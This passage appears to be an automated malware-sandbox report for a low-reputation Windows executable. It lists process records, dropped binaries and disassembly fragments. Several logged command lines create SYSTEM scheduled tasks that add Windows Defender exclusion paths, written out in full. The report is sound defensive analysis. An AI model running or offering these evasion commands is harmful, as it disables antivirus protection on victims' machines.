c8 58 ed a5 b0 2b b5 54 ed a5 70
                                              Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:10:37
                                              Start date:05/01/2025
                                              Path:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\2b687482300.6345827638.08.exe"
                                              Imagebase:0x140000000
                                              File size:30'883'840 bytes
                                              MD5 hash:934C8C307939CD29F7D1D434F1AD09EF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:04:11:39
                                              Start date:05/01/2025
                                              Path:C:\Users\user\Documents\EMp3o1.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Documents\EMp3o1.exe
                                              Imagebase:0x140000000
                                              File size:133'136 bytes
                                              MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:04:12:01
                                              Start date:05/01/2025
                                              Path:C:\Users\user\Documents\EMp3o1.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Documents\EMp3o1.exe
                                              Imagebase:0x140000000
                                              File size:133'136 bytes
                                              MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:8
                                              Start time:04:12:12
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:04:12:12
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Run /TN "Task1"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:18
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\reg.exe
                                              Wow64 process (32bit):false
                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff602f00000
                                              File size:77'312 bytes
                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Run /TN "Task1"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:21
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:22
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:23
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\reg.exe
                                              Wow64 process (32bit):false
                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff602f00000
                                              File size:77'312 bytes
                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:24
                                              Start time:04:12:14
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:25
                                              Start time:04:12:14
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:26
                                              Start time:04:12:14
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:27
                                              Start time:04:12:14
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Run /TN "Task1"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:28
                                              Start time:04:12:15
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:29
                                              Start time:04:12:15
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:30
                                              Start time:04:12:15
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:31
                                              Start time:04:12:15
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\reg.exe
                                              Wow64 process (32bit):false
                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff602f00000
                                              File size:77'312 bytes
                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:32
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:33
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:34
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:35
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Run /TN "Task1"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:36
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:37
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:38
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:39
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\reg.exe
                                              Wow64 process (32bit):false
                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff602f00000
                                              File size:77'312 bytes
                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:40
                                              Start time:04:12:47
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
                                              Imagebase:0x710000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:false

                                              General

                                              Target ID:41
                                              Start time:04:12:49
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
                                              Imagebase:0x710000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:42
                                              Start time:04:12:50
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
                                              Imagebase:0x1f0000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:true

                                              General

                                              Target ID:43
                                              Start time:04:12:51
                                              Start date:05/01/2025
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /c echo.>c:\xxxx.ini
                                              Imagebase:0x1c0000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:44
                                              Start time:04:12:51
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:45
                                              Start time:04:12:52
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
                                              Imagebase:0x1f0000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:46
                                              Start time:04:13:01
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
                                              Imagebase:0x1f0000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:47
                                              Start time:04:13:01
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
                                              Imagebase:0x710000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:2.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:32%
                                                Total number of Nodes:462
                                                Total number of Limit Nodes:7
                                                execution_graph 13951 140005df3 13952 140005e71 13951->13952 13953 140005e84 CreateFileA 13952->13953 13954 140005f50 __SehTransFilter 13953->13954 13955 140005fc3 malloc ReadFile 13954->13955 15105 140007412 15106 140007333 15105->15106 15107 1400073e0 LdrLoadDll 15106->15107 15108 140007403 15106->15108 15107->15106 17118 7ffdac0811b0 17127 7ffdac081209 17118->17127 17119 7ffdac081b70 _log10_special 8 API calls 17122 7ffdac0814d3 17119->17122 17120 7ffdac081b90 51 API calls 17136 7ffdac081300 _invalid_parameter_noinfo_noreturn 17120->17136 17121 7ffdac0814f0 17151 7ffdac081a40 17121->17151 17124 7ffdac08129e 17128 7ffdac0814f6 17124->17128 17137 7ffdac081b90 17124->17137 17125 7ffdac0812c7 17126 7ffdac081b90 51 API calls 17125->17126 17130 7ffdac0812b9 BuildCatchObjectHelperInternal 17126->17130 17127->17121 17127->17124 17127->17125 17127->17130 17127->17136 17154 7ffdac081110 17128->17154 17130->17120 17134 7ffdac0814eb 17146 7ffdac0879cc 17134->17146 17136->17119 17139 7ffdac081b9b 17137->17139 17138 7ffdac0812b0 17138->17130 17138->17134 17139->17138 17140 7ffdac087a4c __free_lconv_mon 2 API calls 17139->17140 17141 7ffdac081bba 17139->17141 17140->17139 17142 7ffdac081bc5 17141->17142 17160 7ffdac0821f0 17141->17160 17144 7ffdac081110 Concurrency::cancel_current_task 51 API calls 17142->17144 17145 7ffdac081bcb 17144->17145 17147 7ffdac087844 _invalid_parameter_noinfo 47 API calls 17146->17147 17148 7ffdac0879e5 17147->17148 17149 7ffdac0879fc _invalid_parameter_noinfo_noreturn 17 API calls 17148->17149 17150 7ffdac0879fa 17149->17150 17164 7ffdac081b34 17151->17164 17155 7ffdac08111e Concurrency::cancel_current_task 17154->17155 17156 7ffdac083990 Concurrency::cancel_current_task 2 API calls 17155->17156 17157 7ffdac08112f 17156->17157 17158 7ffdac08379c __std_exception_copy 49 API calls 17157->17158 17159 7ffdac081159 17158->17159 17161 7ffdac0821fe Concurrency::cancel_current_task 17160->17161 17162 7ffdac083990 Concurrency::cancel_current_task 2 API calls 17161->17162 17163 7ffdac08220f 17162->17163 17169 7ffdac081ab0 17164->17169 17167 7ffdac083990 Concurrency::cancel_current_task 2 API calls 17168 7ffdac081b56 17167->17168 17170 7ffdac08379c __std_exception_copy 49 API calls 17169->17170 17171 7ffdac081ae4 17170->17171 17171->17167 15807 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15810 1400054e0 15807->15810 15809 1400136ef 15811 14000552c 15810->15811 15814 140005506 sprintf_s 15810->15814 15812 1400074d0 LdrLoadDll 15811->15812 15813 140005536 15812->15813 15815 140008370 3 API calls 15813->15815 15814->15809 15818 140005545 __SehTransFilter 15815->15818 15816 1400055b8 15817 140008de0 _lock 2 API calls 15816->15817 15820 1400055c0 sprintf_s 15817->15820 15818->15816 15819 1400074f0 LdrLoadDll 15818->15819 15821 140005561 CreateThread 15819->15821 15820->15814 15821->15820 15822 1400055b0 GetLastError 15821->15822 15822->15816 13960 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13961 140005ab1 13960->13961 13962 140005add GetVersionExA 13960->13962 13965 140005abf 13961->13965 14010 140009540 13961->14010 13963 140005b0e GetProcessHeap HeapFree 13962->13963 13964 140005af0 GetProcessHeap HeapFree 13962->13964 13970 140005b3c 13963->13970 13966 140005d0b 13964->13966 14018 140009300 13965->14018 13969 140005ac9 14029 140008510 GetModuleHandleA 13969->14029 14033 14000a310 HeapCreate 13970->14033 13973 140005ad3 13973->13966 13974 140005bec 13975 140005c12 13974->13975 13976 140005bf0 13974->13976 13980 140005c17 13975->13980 13977 140005bfe 13976->13977 13978 140009540 _lock 12 API calls 13976->13978 13979 140009300 _lock 10 API calls 13977->13979 13978->13977 13981 140005c08 13979->13981 13982 140005c3d 13980->13982 13984 140005c29 13980->13984 13986 140009540 _lock 12 API calls 13980->13986 13983 140008510 _lock 3 API calls 13981->13983 14036 140009f50 GetStartupInfoA 13982->14036 13983->13975 13985 140009300 _lock 10 API calls 13984->13985 13987 140005c33 13985->13987 13986->13984 13989 140008510 _lock 3 API calls 13987->13989 13989->13982 13991 140005c56 14056 140009e30 13991->14056 13994 140005c5b 14074 140009c30 13994->14074 13998 140005c73 13999 140005c81 13998->13999 14000 1400084e0 _lock 12 API calls 13998->14000 14104 140009690 13999->14104 14000->13999 14002 140005c86 14003 140005c94 14002->14003 14004 1400084e0 _lock 12 API calls 14002->14004 14116 140008650 14003->14116 14004->14003 14006 140005c9e 14007 1400084e0 _lock 12 API calls 14006->14007 14008 140005ca9 14006->14008 14007->14008 14120 140001520 14008->14120 14015 14000954e _lock 14010->14015 14011 14000959c 14013 140009300 _lock 10 API calls 14011->14013 14012 14000961c 14012->13965 14013->14012 14014 1400095c9 GetStdHandle 14014->14011 14016 1400095dc 14014->14016 14015->14011 14015->14012 14015->14014 14016->14011 14017 1400095e2 WriteFile 14016->14017 14017->14011 14022 